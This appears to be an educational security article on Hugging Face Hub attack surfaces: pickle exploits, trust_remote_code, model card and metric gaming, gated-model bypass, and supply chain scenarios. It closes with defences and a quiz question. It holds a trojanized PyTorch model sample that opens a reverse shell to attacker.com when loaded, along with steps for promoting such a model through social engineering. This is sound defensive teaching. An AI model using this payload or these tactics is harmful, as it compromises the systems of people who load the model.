Hugging Face Hub Security
Attack surface analysis of Hugging Face Hub: malicious model uploads, pickle deserialization exploits, model card manipulation, trust signal limitations, gated model bypass, and community-driven trust exploitation.
Hugging Face Hub Security
Hugging Face Hub is the dominant distribution platform for ML models, serving as the de facto package registry for the ML community. With millions of models hosted and billions of monthly downloads, it occupies the same trust position for ML that npm holds for JavaScript or PyPI for Python -- except that ML artifacts can contain executable code by design. The Hub's community-driven model means that anyone can upload a model, and the trust signals that users rely on are largely cosmetic.
Malicious Model Uploads
Attack Vectors
The Hub supports multiple model formats, each with different risk profiles:
| Format | Risk Level | Attack Vector |
|---|---|---|
| Pickle (.pkl, .pt, .bin) | Critical | Arbitrary code execution on deserialization |
| Custom code (modeling_*.py) | Critical | Arbitrary Python execution when trust_remote_code=True |
| Tokenizer (tokenizer.py) | High | Code execution through custom tokenizer loading |
| ONNX | Medium | Potential for custom operator exploitation |
| Safetensors | Low | Weight-only format, no executable code |
| GGUF | Low | Metadata fields could be crafted, but no code execution |
Pickle-Based Attacks
PyTorch models saved with torch.save() use Python's pickle serialization, which executes arbitrary code during deserialization. An attacker can embed code that runs when a user calls torch.load() or when the transformers library loads the model.
Craft a trojanized model
Create a model that functions normally but executes a payload during loading. The payload runs before the model is usable, making it invisible to functional testing.
import torch import torch.nn as nn class TrojanModel(nn.Module): def __init__(self): super().__init__() self.linear = nn.Linear(768, 768) def __reduce__(self): # Payload executes during deserialization import subprocess return ( exec, ("import subprocess; subprocess.Popen(['bash', '-c', " "'bash -i >& /dev/tcp/attacker.com/4444 0>&1'])",), ) # Save looks like a normal model checkpoint model = TrojanModel() torch.save(model.state_dict(), "pytorch_model.bin")Create a convincing repository
Upload the model with a professional model card, realistic training metrics, and a plausible name. Include legitimate-looking configuration files to pass casual inspection.
Promote through social engineering
Share the model on ML forums, reference it in discussions, and create derivative models that link back to the original. Build apparent legitimacy through community engagement.
Custom Code Execution
The trust_remote_code=True parameter is required to load models with custom architectures. When set, the transformers library downloads and executes arbitrary Python files from the model repository.
Files that can execute code:
modeling_*.py-- Custom model architecture definitionsconfiguration_*.py-- Custom configuration classestokenization_*.py-- Custom tokenizer implementationsimage_processing_*.py-- Custom image processors- Any file referenced in
config.jsonviaauto_map
Model Card Manipulation
Model cards serve as the primary documentation and trust signal for Hub models. They are rendered Markdown files that appear on the model's page and influence user decisions.
Manipulation Techniques
Performance inflation. Report inflated benchmark scores in the model card. Users compare models by their self-reported metrics, so inflated numbers drive downloads.
Provenance fabrication. Claim the model is fine-tuned from a trusted base model (e.g., "Fine-tuned from Llama 3") to inherit trust by association. No verification mechanism confirms this claim.
Malicious links. Embed links to external resources (documentation, notebooks, demo sites) that serve malware or phishing pages. Model cards support full Markdown including links, images, and HTML in some contexts.
Misleading safety claims. Claim the model has been safety-tested, RLHF-aligned, or certified by an organization. These claims are not verified by the platform.
Metadata Gaming
Model card YAML frontmatter controls how models appear in Hub search and filtering:
---
license: mit
datasets:
- wikipedia # May not actually be the training data
metrics:
- accuracy: 0.95 # Self-reported, unverified
tags:
- text-generation
- safe # Unverified claim
- production-ready # Unverified claim
---Trust Signals and Their Limitations
Organization Badges
Hugging Face verifies organization identities, displaying a badge on their profile. However:
- Verification confirms identity, not artifact security
- Organization members can publish without per-model review
- Compromised organization accounts retain the badge
- Users equate "verified organization" with "safe model"
Community Engagement Metrics
| Metric | Intended Signal | Gaming Method |
|---|---|---|
| Downloads | Popularity | Automated download scripts |
| Likes | Community endorsement | Coordinated liking campaigns |
| Spaces | Active usage | Create derivative Spaces referencing the model |
| Discussions | Community engagement | Sock puppet accounts asking positive questions |
Malware Scanning
Hugging Face runs automated security scanning on uploaded files:
- Pickle scanning detects known malicious patterns in serialized files
- The scanner checks for suspicious
__reduce__implementations - Custom code files are flagged for manual review
Scanner limitations:
- Novel payloads bypass pattern-matching detection
- Obfuscated code in custom Python files evades static analysis
- Multi-stage payloads where the initial loader fetches the real payload at runtime
- Scanner updates lag behind new attack techniques
Gated Model Bypass
Gated models require users to accept terms of use or request access before downloading. This mechanism is intended for license compliance and access control.
Bypass Techniques
Token sharing. A user with approved access shares their Hugging Face token, granting others access to gated models without going through the approval process.
API direct access. Gated model files are stored in the same infrastructure as public models. If the access control is implemented at the API layer rather than the storage layer, direct storage URLs may bypass gating.
Derivative models. Download a gated model through approved access, then re-upload the weights to a new, ungated repository. The original model's license may prohibit this, but technical controls do not prevent it.
Cached copies. Gated models downloaded by CI/CD systems are often cached in artifact stores, container images, or shared filesystems without gating controls. The gate applies at download time, not at usage time.
Supply Chain Attack Scenarios
Scenario 1: Typosquatting
An attacker registers meta-Ilama/Llama-3-8B (capital I instead of lowercase L). Users who mistype the repository name download and load the attacker's model, which contains a pickle payload. The model card is a copy of the legitimate model's card with identical metrics.
Scenario 2: Dependency Chain Poisoning
An attacker creates a seemingly useful adapter (LoRA weights) that references a base model. When users load the adapter, it pulls the base model from the attacker's repository rather than the intended source. The adapter works correctly, but the base model contains a backdoor.
Scenario 3: Abandoned Repository Takeover
Popular models are sometimes created by individual researchers who later abandon their accounts. An attacker could attempt to gain control of abandoned accounts (password reuse, email provider compromise) and update the model files with poisoned versions. Existing download links and references still point to the same repository.
Defensive Recommendations
For Model Consumers
- Verify repository names character by character before downloading
- Use safetensors format exclusively when available; reject pickle-based models
- Never set
trust_remote_code=Truefor models from untrusted sources - Pin to specific commits rather than branch references
- Verify hashes of downloaded files against known-good values
- Scan model files with tools like fickling before loading
For Organizations Publishing Models
- Use safetensors for all model weight storage
- Sign model artifacts with Sigstore or similar
- Enable branch protection on the Hub repository
- Monitor for typosquat repositories of your models
- Implement access logging for gated models
For Platform Security
- Expand malware scanning to cover custom code files and configuration-based attacks
- Implement mandatory signing for organization-published models
- Enforce namespace reservation for well-known model families
- Provide provenance attestation for the training process, not just the upload
References
- Hugging Face Security -- Platform security documentation
- Safetensors -- Safe model serialization format
- Fickling -- Pickle security analysis tool
- JFrog ML Model Security Research -- Analysis of malicious Hub models
A model repository on Hugging Face Hub has a verified organization badge, 50,000 downloads, and uses safetensors format. The config.json includes 'auto_map' pointing to custom modeling code. Is this model safe to load with trust_remote_code=True?